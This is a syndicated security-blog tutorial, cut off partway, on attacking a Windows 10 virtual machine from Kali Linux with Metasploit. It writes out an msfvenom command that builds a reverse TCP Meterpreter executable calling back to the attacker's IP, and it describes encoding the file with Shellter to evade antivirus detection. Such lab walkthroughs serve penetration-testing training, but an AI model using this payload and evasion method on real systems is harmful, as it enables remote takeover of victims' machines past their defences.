How to Attack Windows 10 Machine with Metasploit on Kali Linux

Introduction

The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. We shall do this through a malicious executable file using Shellter.

This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on VirtualBox.

Creating a Malicious .exe File

To create the executable, you would use msfvenom as shown in the command below:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port to listen on for a connection from the target once it has been compromised.

To obtain our IP address we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet) as shown below.

The screenshot below shows the output of the command on successful .exe generation.

Antivirus solutions work by detecting malicious signatures within executables. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.

To encode our executable, we shall be using Shellter. Shellter works (Read more...)

*** This is a Security Bloggers Network syndicated blog from InfoSec Resources authored by Lester Obbayi. Read the original post at: http://feedproxy.google.com/~r/infosecResources/~3/jJAVaM3o0go/